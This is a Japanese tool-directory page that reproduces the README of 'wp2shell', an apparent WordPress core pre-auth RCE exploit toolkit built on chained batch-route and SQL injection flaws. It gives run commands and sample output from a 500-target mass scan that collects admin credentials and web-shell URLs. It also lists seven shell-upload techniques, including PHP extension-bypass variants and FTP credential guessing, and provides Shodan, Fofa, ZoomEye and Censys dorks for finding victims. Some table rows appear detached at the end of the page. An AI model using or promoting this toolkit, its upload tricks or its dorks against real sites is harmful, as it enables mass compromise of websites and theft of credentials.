Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-63030 — WordPress Core Pre-Auth RCE — バッチルート混乱 + SQLインジェクション | Kitploit
ツール/GitHubGitHub/anggatechi/cve-2026-63030
偵察脆弱性スキャナーエクスプロイトウェブアプリケーション悪用ポストエクスプロイトペネトレーションテスト
GitHubanggatechi/cve-2026-63030

CVE-2026-63030

WordPress Core Pre-Auth RCE — バッチルート混乱 + SQLインジェクション

リポジトリを見る
13日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

wp2shell — WordPress コアの事前認証RCE

CVE-2026-63030(バッチルート混乱)+ CVE-2026-60137(SQLインジェクション)

WordPress コアの wp2shell 脆弱性チェーン向けの、依存関係ゼロのエクスプロイトツールキットです。プラグインが不要なデフォルトの WordPress インストールに対し、単一の匿名 HTTP リクエストでリモートコード実行を達成します。


📋 目次

  • 影響を受けるバージョン
  • エクスプロイトの流れ
  • クイックスタート
  • デモ
  • 機能
  • アップロード方法
  • 出力ファイル
  • Dork / ハンティング
  • 参考文献
  • 免責事項

🎯 影響を受けるバージョン

範囲影響修正バージョン
7.0.0 – 7.0.1フルRCE7.0.2
6.9.0 – 6.9.4フルRCE

プラグインや特別な設定は不要です。 素の WordPress インストールでも悪用可能です。


🔗 エクスプロイトの流れ

root@kitploit:~
┌─────────────────────────────────────┐
│  ANONYMOUS HTTP REQUEST             │
│  POST /?rest_route=/batch/v1        │
└────────────────┬────────────────────┘
                 │
┌────────────────▼────────────────────┐
│  CVE-2026-63030: Batch Desync       │
│  Malformed path → WP_Error →        │
│  Array misalignment → Auth Bypass   │
└────────────────┬────────────────────┘
                 │
┌────────────────▼────────────────────┐
│  CVE-2026-60137: SQL Injection      │
│  author__not_in → unsanitized →     │
│  UNION SELECT extraction            │
└────────────────┬────────────────────┘
                 │
     ┌───────────┼───────────┐
     │           │           │
┌────▼────┐ ┌───▼────┐ ┌───▼──────────┐
│ oEmbed  │ │ Blind  │ │ Changeset    │
│ Seeding │ │ SQLi   │ │ Re-entrancy  │
│ Write   │ │ Read   │ │ Escalation   │
│ Cache   │ │ IDs    │ │ → Admin User │
└────┬────┘ └───┬────┘ └───┬──────────┘
     │           │           │
     └───────────┼───────────┘
                 │
┌────────────────▼────────────────────┐
│  ADMIN CREATED (pre-auth!)          │
│  → Login → Upload Shell (7 methods) │
└─────────────────────────────────────┘

🚀 クイックスタート

root@kitploit:~
pip install requests
python exploit.py
root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║  WP2SHELL — WordPress Core Pre-Auth RCE Exploit              ║
║  CVE-2026-63030 (Batch Route Confusion) + CVE-2026-60137    ║
║  Affected: WP 6.9.0 – 7.0.1  |  Fixed: 6.9.5 / 7.0.2       ║
╚══════════════════════════════════════════════════════════════╝

  [?] Target [url/list.txt] > list.txt
  [?] Threads [15] > 15

単一ターゲット

root@kitploit:~
python exploit.py
root@kitploit:~
  [?] Target [url/list.txt] > https://vulnerable-site.com

  ┌────────────────────────────────────────────────────────┐
  │                    SCAN CONFIGURATION                   │
  ├────────────────────────────────────────────────────────┤
  │  Targets : 1       Threads  : 1      Dir  : wp_core_rce│
  └────────────────────────────────────────────────────────┘

  ┌────────────────────────────────────────────────────────┐
  │  EXPLOIT SUCCESS                                       │
  ├────────────────────────────────────────────────────────┤
  │  Method : direct-plugin                                │
  │  Shell  : https://target.com/wp-content/plugins/...  │
  │  Login  : https://target.com/wp-login.php              │
  │  User   : wp2s_abc123def                               │
  │  Pass   : WP2S!xxxxxxxxxxxxxxxx                        │
  └────────────────────────────────────────────────────────┘

一括スキャン

root@kitploit:~
python exploit.py
root@kitploit:~
┌────────────────────────────────────────────────────────┐
│                    SCAN CONFIGURATION                   │
├────────────────────────────────────────────────────────┤
│  Targets : 500    Threads  : 15     Dir  : wp_core_rce │
└────────────────────────────────────────────────────────┘
┌────────────┬────────────────────────────────────────┬──────────────┐
│            │                                        │              │
│  #/TOTAL   │ HOST                                   │ STATUS       │
├────────────┼────────────────────────────────────────┼──────────────┤
│    1/500   │ vulnerable-site.com                    │ SHELL        │
│            │   ↳ direct-plugin → https://vulnerabl...             │
│    2/500   │ target2.com                            │ ADM          │
│    3/500   │ safe-site.org                          │ SQLi         │
│    4/500   │ nope.com                               │ NO           │
│    5/500   │ jackpot.net                            │ SHELL        │
│            │   ↳ theme-editor → https://jackpot.ne...              │
└────────────┴────────────────────────────────────────┴──────────────┘
┌────────────────────────────────────────────────────────┐
│  SHELL     2   ADMIN    3   SQLi   15   TOTAL    50/500│
└────────────────────────────────────────────────────────┘
├────────────────────────────────────────────────────────┤
│  result.txt         │  admin credentials               │
│  result_upload.txt  │  shell upload URLs               │
│  log/scanned.txt    │  scanned hosts                   │
└────────────────────────────────────────────────────────┘

✨ 機能

  • 依存関係ゼロ — Python 3.11+ の標準ライブラリのみ(requests はエキスパンダー専用)
  • マルチスレッド — デフォルト15スレッド、最大30スレッド
  • 自動再開 — log/scanned.txt でスキャン済みターゲットをスキップ
  • サイレントバッチモード — クリーンなテーブル出力、ログのスパムなし
  • 自動検出 — WordPress + バッチAPI + SQLi の利用可否チェック
  • 7つの並列アップロード方法 — 最初に成功した方法が優先されるレースコンディション

📤 アップロード方法

7つのメソッドはすべて ThreadPoolExecutor 経由で並列実行されます。最初に成功したメソッドが優先され、残りはキャンセルされます。

メディアアップロードの拡張子: .phtml .php5 .php7 .php8 .pht .phar .shtml .php4 .phps .phtm .Php5 .PhP5 .pHtml .phP .PHP

試行されるFTP認証情報: localhost / 127.0.0.1 と root / www-data / WordPress 管理者認証情報


📁 出力ファイル

ファイル内容
result.txt管理者認証情報: url.com/wp-login.php:user:pass
result_upload.txtシェルURL: shell_url | login_url:user:pass | method
log/scanned.txtスキャン済みの全ホスト(再実行時は自動スキップ)

🔍 Dork / ハンティング

Shodan

root@kitploit:~
http.title:"WordPress"
http.component:"WordPress"

Fofa

root@kitploit:~
app="WordPress"
body="wp-json"
body="/batch/v1"

ZoomEye

root@kitploit:~
app:"WordPress"
"/wp-json/batch/v1"

Censys

root@kitploit:~
services.http.response.body:"/wp-json/batch/v1"

📚 参考文献

  • Searchlight Cyber アドバイザリ
  • Hadrian テクニカルブログ
  • WordPress 7.0.2 リリース
  • Assetnote リサーチ
  • Wordfence 脅威インテル

⚠️ 免責事項

このツールは許可されたセキュリティ研究および侵入テスト専用に提供されます。所有しているシステム、または明示的な書面によるテスト許可を得たシステムでのみ使用してください。著者は不正使用に対する一切の責任を負いません。


📄 ライセンス

MITライセンス。詳細は LICENSE を参照してください。

ツールをダウンロード
6.9.5
6.8.0 – 6.8.5SQLiのみ6.8.6
#メソッド説明
1direct-plugin/wp-admin/plugin-install.php 経由でzipをアップロード
2direct-theme/wp-admin/theme-install.php 経由でzipをアップロード
3rest-api認証Cookie付きで /wp-json/wp/v2/plugins にzipをPOST
4plugin-editor/wp-admin/plugin-editor.php 経由でPHPを直接書き込み
5theme-editorアクティブテーマのディレクトリにPHPを書き込み
6ftp-bypassWordPressが要求したときにFTP認証情報を送信
7media-upload15種類の拡張子バリエーションでメディアライブラリ経由のPHPアップロード